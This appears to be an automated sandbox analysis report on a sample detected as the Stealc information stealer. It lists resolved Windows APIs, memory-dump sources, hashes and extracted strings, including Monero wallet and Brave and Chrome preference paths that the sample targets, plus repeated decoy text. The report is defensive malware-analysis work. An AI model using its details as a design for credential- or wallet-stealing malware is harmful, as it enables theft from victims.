Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1931818281.000000000082E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1734725607.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	5.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	11.2%
Total number of Nodes:	2000
Total number of Limit Nodes:	37

Executed Functions

Function 00989860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,008423B0), ref: 009898A1
GetProcAddress.KERNEL32(74DD0000,00842230), ref: 009898BA
GetProcAddress.KERNEL32(74DD0000,008424E8), ref: 009898D2
GetProcAddress.KERNEL32(74DD0000,00842260), ref: 009898EA
GetProcAddress.KERNEL32(74DD0000,008422C0), ref: 00989903
GetProcAddress.KERNEL32(74DD0000,00849008), ref: 0098991B
GetProcAddress.KERNEL32(74DD0000,00835850), ref: 00989933
GetProcAddress.KERNEL32(74DD0000,00835770), ref: 0098994C
GetProcAddress.KERNEL32(74DD0000,008422F0), ref: 00989964
GetProcAddress.KERNEL32(74DD0000,00842380), ref: 0098997C
GetProcAddress.KERNEL32(74DD0000,00842320), ref: 00989995
GetProcAddress.KERNEL32(74DD0000,008423C8), ref: 009899AD
GetProcAddress.KERNEL32(74DD0000,00835870), ref: 009899C5
GetProcAddress.KERNEL32(74DD0000,00842488), ref: 009899DE
GetProcAddress.KERNEL32(74DD0000,00842500), ref: 009899F6
GetProcAddress.KERNEL32(74DD0000,00835A50), ref: 00989A0E
GetProcAddress.KERNEL32(74DD0000,00842350), ref: 00989A27
GetProcAddress.KERNEL32(74DD0000,008423E0), ref: 00989A3F
GetProcAddress.KERNEL32(74DD0000,00835970), ref: 00989A57
GetProcAddress.KERNEL32(74DD0000,008424A0), ref: 00989A70
GetProcAddress.KERNEL32(74DD0000,008358D0), ref: 00989A88
LoadLibraryA.KERNEL32(00842560,?,00986A00), ref: 00989A9A
LoadLibraryA.KERNEL32(00842548,?,00986A00), ref: 00989AAB
LoadLibraryA.KERNEL32(008425A8,?,00986A00), ref: 00989ABD
LoadLibraryA.KERNEL32(008425C0,?,00986A00), ref: 00989ACF
LoadLibraryA.KERNEL32(008425D8,?,00986A00), ref: 00989AE0
GetProcAddress.KERNEL32(75A70000,00842590), ref: 00989B02
GetProcAddress.KERNEL32(75290000,00842518), ref: 00989B23
GetProcAddress.KERNEL32(75290000,00842530), ref: 00989B3B
GetProcAddress.KERNEL32(75BD0000,00842578), ref: 00989B5D
GetProcAddress.KERNEL32(75450000,00835790), ref: 00989B7E
GetProcAddress.KERNEL32(76E90000,008490F8), ref: 00989B9F
GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00989BB6

Strings

NtQueryInformationProcess, xrefs: 00989BAA

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: e923589223abc49188e44bf9ec5007067a9d99b45865e2bd624a86130da96dc3
Instruction ID: 08397eaee048f5291477e760b64a7d89e0206072bf97318e0218262b4c3b320d
Opcode Fuzzy Hash: e923589223abc49188e44bf9ec5007067a9d99b45865e2bd624a86130da96dc3
Instruction Fuzzy Hash: 9CA14EB5D08240AFD354EFAAFD88A663BF9F74C301754471AA609C3664DFBA9841CB13

Function 009745C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000), ref: 0097460F
VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0097479C

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009746C2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009745E8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00974678
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0097473F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009745D2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00974734
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00974657
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00974765
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0097466D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009745F3
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00974643
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009746D8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009745C7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00974683
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009746B7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009746CD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00974617
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0097462D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00974662
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00974729
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00974713
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0097471E
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0097477B
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009746AC
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00974622
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0097474F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0097475A
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009745DD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00974770
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00974638

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: AllocateHeapProtectVirtual
String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 1542196881-2218711628
Opcode ID: 8dfd3f041e3f59569d734efbec310d610d6738035dbfdd0fc17cfe787c16f680
Instruction ID: e63c3530e3e6db94fbb179fda285e06bbc82cd750aa1984f9c2ae0f30c08d879
Opcode Fuzzy Hash: 8dfd3f041e3f59569d734efbec310d610d6738035dbfdd0fc17cfe787c16f680
Instruction Fuzzy Hash: 104149A0EF67057AEE35BFAE8852DBF73535FC278CF415240AC2952280C772672056B2

Function 0097BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0098A740: lstrcpy.KERNEL32(00990E17,00000000), ref: 0098A788

Part of subcall function 0098A920: lstrcpy.KERNEL32(00000000,?), ref: 0098A972
Part of subcall function 0098A920: lstrcat.KERNEL32(00000000), ref: 0098A982

Part of subcall function 0098A9B0: lstrlen.KERNEL32(?,00849138,?,\Monero\wallet.keys,00990E17), ref: 0098A9C5
Part of subcall function 0098A9B0: lstrcpy.KERNEL32(00000000), ref: 0098AA04
Part of subcall function 0098A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AA12

Part of subcall function 0098A8A0: lstrcpy.KERNEL32(?,00990E17), ref: 0098A905

FindFirstFileA.KERNEL32(00000000,?,00990B32,00990B2B,00000000,?,?,?,009913F4,00990B2A), ref: 0097BEF5
StrCmpCA.SHLWAPI(?,009913F8), ref: 0097BF4D
StrCmpCA.SHLWAPI(?,009913FC), ref: 0097BF63
FindNextFileA.KERNEL32(000000FF,?), ref: 0097C7BF
FindClose.KERNEL32(000000FF), ref: 0097C7D1

Strings

Brave, xrefs: 0097C102
\Brave\Preferences, xrefs: 0097C1DB
Google Chrome, xrefs: 0097C634
Preferences, xrefs: 0097C11E

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-726946144
Opcode ID: 605c39d953a7e85d4e20ffc3f10077bc061c428abaece0c3ce5ee55a82111c68
Instruction ID: a7da18ea665f3188d445374df0655fd6347595375336d836f610de4bcf551cae
Opcode Fuzzy Hash: 605c39d953a7e85d4e20ffc3f10077bc061c428abaece0c3ce5ee55a82111c68
Instruction Fuzzy Hash: DF424372910104ABDB14FB70DD96FED737DABD4300F408559F50AA7291EE38AB49CBA2

Function 6C5C35A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6C64F688,00001000), ref: 6C5C35D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C5C35E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6C5C35FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C5C363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C5C369F
__aulldiv.LIBCMT ref: 6C5C36E4
QueryPerformanceCounter.KERNEL32(?), ref: 6C5C3773
EnterCriticalSection.KERNEL32(6C64F688), ref: 6C5C377E
LeaveCriticalSection.KERNEL32(6C64F688), ref: 6C5C37BD
QueryPerformanceCounter.KERNEL32(?), ref: 6C5C37C4
EnterCriticalSection.KERNEL32(6C64F688), ref: 6C5C37CB
LeaveCriticalSection.KERNEL32(6C64F688), ref: 6C5C3801
__aulldiv.LIBCMT ref: 6C5C3883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C5C3902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C5C3918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C5C394C

Strings

AuthcAMDenti, xrefs: 6C5C3946
GenuntelineI, xrefs: 6C5C3639
QPC, xrefs: 6C5C38FC
GTC, xrefs: 6C5C3912
MOZ_TIMESTAMP_MODE, xrefs: 6C5C35DB

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: 381154e06a06cc23cb0cf1ccbb597bf4616bdc1d449003927f2db8f2cb0fb008
Instruction ID: 3246332e0a862dacf2f2a6b3f5785003fab8453d214601127360ad0ad4d8e4d3
Opcode Fuzzy Hash: 381154e06a06cc23cb0cf1ccbb597bf4616bdc1d449003927f2db8f2cb0fb008
Instruction Fuzzy Hash: 12B1D871B093109FDB08EF69C89465ABBF5FBCA708F04C92DE899D3750D77099018B8A

Function 00984910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 0098492C
FindFirstFileA.KERNEL32(?,?), ref: 00984943
StrCmpCA.SHLWAPI(?,00990FDC), ref: 00984971
StrCmpCA.SHLWAPI(?,00990FE0), ref: 00984987
FindNextFileA.KERNEL32(000000FF,?), ref: 00984B7D
FindClose.KERNEL32(000000FF), ref: 00984B92

Strings

%s\%s, xrefs: 009849FB
%s\%s, xrefs: 009849A4
%s\*, xrefs: 00984920

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: 614b34faa2c9d78b59e6774d3ea078cb0aa6d1928352823af7e4e256073ce883
Instruction ID: 0302f3a80b98782736a74d10d5e29b6d951034fb2c92702d593c2454e24cab6c
